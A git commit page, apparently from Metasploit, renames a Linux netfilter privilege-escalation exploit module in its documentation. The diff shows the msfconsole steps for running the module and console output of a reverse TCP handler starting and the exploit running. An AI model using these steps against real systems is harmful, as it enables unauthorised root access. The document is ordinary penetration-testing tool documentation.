Land #7579, rename netfilter_priv_esc to rename netfilter_priv_esc_ipv4

bug/bundler_fix
Brent Cook 2016-11-21 17:59:29 -06:00
commit 59f3c9e769
No known key found for this signature in database
GPG Key ID: 1FFAA0B24B708F96
2 changed files with 6 additions and 6 deletions

View File

@ -27,7 +27,7 @@ This does not work against the following vulnerable systems. Additional work ma
1. Start msfconsole
2. Exploit a box via whatever method
4. Do: `use exploit/linux/local/netfilter_priv_esc`
4. Do: `use exploit/linux/local/netfilter_priv_esc_ipv4`
5. Do: `set session #`
6. Do: `set verbose true`
7. Do: `exploit`
@ -115,7 +115,7 @@ This does not work against the following vulnerable systems. Additional work ma
#### Escalate w/ pre-compiled binaries
msf exploit(netfilter_priv_esc) > exploit
msf exploit(netfilter_priv_esc_ipv4) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed
@ -160,9 +160,9 @@ This does not work against the following vulnerable systems. Additional work ma
In this scenario, we already exploit the box, for whatever reason our shell died. So now we want to re-exploit, but we dont need to run desc again.
msf exploit(netfilter_priv_esc) > set reexploit true
msf exploit(netfilter_priv_esc_ipv4) > set reexploit true
reexploit => true
msf exploit(netfilter_priv_esc) > exploit
msf exploit(netfilter_priv_esc_ipv4) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed
@ -191,9 +191,9 @@ In this scenario, we already exploit the box, for whatever reason our shell died
#### Re-exploit w/ pre-compiled binaries
msf exploit(netfilter_priv_esc) > set reexploit true
msf exploit(netfilter_priv_esc_ipv4) > set reexploit true
reexploit => true
msf exploit(netfilter_priv_esc) > exploit
msf exploit(netfilter_priv_esc_ipv4) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed